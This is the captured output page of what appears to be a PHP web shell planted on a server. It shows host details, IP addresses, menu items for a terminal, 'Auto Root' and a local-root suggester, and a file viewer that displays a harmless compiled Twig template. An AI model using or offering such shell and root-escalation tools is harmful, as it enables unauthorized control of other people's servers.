Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.141.29.119
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
var /
cache /
prod /
twig /
e8 /
Delete
Unzip
Name
Size
Permission
Date
Action
e8366b1cae31d5c5edce281ba6633690d51d1aa04b1dcbcca48dd74dba76cf49.php
5.25
KB
-rw-rw-r--
2022-12-09 22:56
Save
Rename
<?php use Twig\Environment; use Twig\Error\LoaderError; use Twig\Error\RuntimeError; use Twig\Extension\SandboxExtension; use Twig\Markup; use Twig\Sandbox\SecurityError; use Twig\Sandbox\SecurityNotAllowedTagError; use Twig\Sandbox\SecurityNotAllowedFilterError; use Twig\Sandbox\SecurityNotAllowedFunctionError; use Twig\Source; use Twig\Template; /* @Doctrine/Collector/explain.html.twig */ class __TwigTemplate_414f19bcf6b3e200ab163f3a8289ff9d40daf57e61a469ac487bc5b42b6820b5 extends Template { private $source; private $macros = []; public function __construct(Environment $env) { parent::__construct($env); $this->source = $this->getSourceContext(); $this->parent = false; $this->blocks = [ ]; } protected function doDisplay(array $context, array $blocks = []) { $macros = $this->macros; // line 1 if ((1 === twig_compare(twig_length_filter($this->env, (($__internal_compile_0 = ($context["data"] ?? null)) && is_array($__internal_compile_0) || $__internal_compile_0 instanceof ArrayAccess ? ($__internal_compile_0[0] ?? null) : null)), 1))) { // line 2 echo " "; // line 3 echo " <table style=\"margin: 5px 0;\"> <thead> <tr> "; // line 6 $context['_parent'] = $context; $context['_seq'] = twig_ensure_traversable(twig_get_array_keys_filter((($__internal_compile_1 = ($context["data"] ?? null)) && is_array($__internal_compile_1) || $__internal_compile_1 instanceof ArrayAccess ? ($__internal_compile_1[0] ?? null) : null))); foreach ($context['_seq'] as $context["_key"] => $context["label"]) { // line 7 echo " <th>"; echo twig_escape_filter($this->env, $context["label"], "html", null, true); echo "</th> "; } $_parent = $context['_parent']; unset($context['_seq'], $context['_iterated'], $context['_key'], $context['label'], $context['_parent'], $context['loop']); $context = array_intersect_key($context, $_parent) + $_parent; // line 9 echo " </tr> </thead> <tbody> "; // line 12 $context['_parent'] = $context; $context['_seq'] = twig_ensure_traversable(($context["data"] ?? null)); foreach ($context['_seq'] as $context["_key"] => $context["row"]) { // line 13 echo " <tr> "; // line 14 $context['_parent'] = $context; $context['_seq'] = twig_ensure_traversable($context["row"]); foreach ($context['_seq'] as $context["key"] => $context["item"]) { // line 15 echo " <td>"; echo twig_escape_filter($this->env, twig_replace_filter($context["item"], ["," => ", "]), "html", null, true); echo "</td> "; } $_parent = $context['_parent']; unset($context['_seq'], $context['_iterated'], $context['key'], $context['item'], $context['_parent'], $context['loop']); $context = array_intersect_key($context, $_parent) + $_parent; // line 17 echo " </tr> "; } $_parent = $context['_parent']; unset($context['_seq'], $context['_iterated'], $context['_key'], $context['row'], $context['_parent'], $context['loop']); $context = array_intersect_key($context, $_parent) + $_parent; // line 19 echo " </tbody> </table> "; } else { // line 22 echo " "; // line 23 echo " <pre style=\"margin: 5px 0;\">"; // line 24 $context['_parent'] = $context; $context['_seq'] = twig_ensure_traversable(($context["data"] ?? null)); foreach ($context['_seq'] as $context["_key"] => $context["row"]) { // line 25 echo twig_escape_filter($this->env, twig_first($this->env, $context["row"]), "html", null, true); echo " "; } $_parent = $context['_parent']; unset($context['_seq'], $context['_iterated'], $context['_key'], $context['row'], $context['_parent'], $context['loop']); $context = array_intersect_key($context, $_parent) + $_parent; // line 27 echo "</pre> "; } } public function getTemplateName() { return "@Doctrine/Collector/explain.html.twig"; } public function isTraitable() { return false; } public function getDebugInfo() { return array ( 112 => 27, 104 => 25, 100 => 24, 98 => 23, 96 => 22, 91 => 19, 84 => 17, 75 => 15, 71 => 14, 68 => 13, 64 => 12, 59 => 9, 50 => 7, 46 => 6, 41 => 3, 39 => 2, 37 => 1,); } public function getSourceContext() { return new Source("", "@Doctrine/Collector/explain.html.twig", "/home/www/wb/vendor/doctrine/doctrine-bundle/Resources/views/Collector/explain.html.twig"); } }